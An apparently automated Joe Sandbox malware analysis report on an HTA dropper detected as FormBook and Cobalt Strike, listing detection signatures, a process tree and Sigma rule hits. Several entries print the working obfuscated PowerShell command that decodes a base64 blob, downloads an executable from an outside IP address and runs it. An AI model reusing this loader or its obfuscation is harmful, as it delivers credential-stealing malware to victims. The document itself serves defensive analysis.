Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
clearpicturewithmebestthingsforgivenmebest.hta

Overview

General Information

Sample name:clearpicturewithmebestthingsforgivenmebest.hta
Analysis ID:1640150
MD5:572304f6b5fe3cb059e6bb7443d5341e
SHA1:4e45a50877a83388c84364c2ceb969ce136dae4b
SHA256:4962c3dba2f96f31a98e105eddc0e5e7a474a5368c6f851e86f91bf05654ab86
Tags:Formbookhtauser-abuse_ch
Infos:

Detection

Cobalt Strike, FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected Powershell decode and execute
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
PowerShell case anomaly found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Parents
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 8712 cmdline: mshta.exe "C:\Users\user\Desktop\clearpicturewithmebestthingsforgivenmebest.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 8768 cmdline: "C:\Windows\system32\cmd.exe" "/c powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8812 cmdline: powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 8932 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 8948 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A73.tmp" "c:\Users\user\AppData\Local\Temp\fjq1drut\CSC5A43CF9668DC424F8B475C31EBB405.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • cosses.exe (PID: 9000 cmdline: "C:\Users\user\AppData\Roaming\cosses.exe" MD5: C338C9CDCCB21A6F023987865B4A6269)
          • svchost.exe (PID: 9036 cmdline: "C:\Users\user\AppData\Roaming\cosses.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • hudFv7yP8kEYIbmJoqYH.exe (PID: 1672 cmdline: "C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\js6QKahy.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
              • calc.exe (PID: 8452 cmdline: "C:\Windows\SysWOW64\calc.exe" MD5: 961E093BE1F666FD38602AD90A5F480F)
                • hudFv7yP8kEYIbmJoqYH.exe (PID: 6856 cmdline: "C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\5NAHkWkYd1Lwd.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
                • firefox.exe (PID: 8240 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.3816264439.0000000003230000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.1687105036.00000000039A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.3817612189.0000000004F00000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.1684081260.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000D.00000002.3819745162.0000000005830000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              7.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Other

                SourceRuleDescriptionAuthorStrings
                amsi32_8812.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Suspicious MSHTA Child Process
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgI
                  Sigma detected: Suspicious Process Parents
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\5NAHkWkYd1Lwd.exe" , CommandLine: "C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\5NAHkWkYd1Lwd.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe, NewProcessName: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe, OriginalFileName: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe, ParentCommandLine: "C:\Windows\SysWOW64\calc.exe", ParentImage: C:\Windows\SysWOW64\calc.exe, ParentProcessId: 8452, ParentProcessName: calc.exe, ProcessCommandLine: "C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\5NAHkWkYd1Lwd.exe" , ProcessId: 6856, ProcessName: hudFv7yP8kEYIbmJoqYH.exe
                  Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8812, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline", ProcessId: 8932, ProcessName: csc.exe
                  Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8812, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cosses[1].exe
                  Sigma detected: Uncommon Svchost Parent Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\cosses.exe" , CommandLine: "C:\Users\user\AppData\Roaming\cosses.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cosses.exe" , ParentImage: C:\Users\user\AppData\Roaming\cosses.exe, ParentProcessId: 9000, ParentProcessName: cosses.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\cosses.exe" , ProcessId: 9036, ProcessName: svchost.exe
                  Sigma detected: Dynamic CSharp Compile Artefact
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8812, TargetFilename: C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))", CommandLine: powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\cosses.exe" , CommandLine: "C:\Users\user\AppData\Roaming\cosses.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cosses.exe" , ParentImage: C:\Users\user\AppData\Roaming\cosses.exe, ParentProcessId: 9000, ParentProcessName: cosses.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\cosses.exe" , ProcessId: 9036, ProcessName: svchost.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Dot net compiler compiles file from suspicious location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; 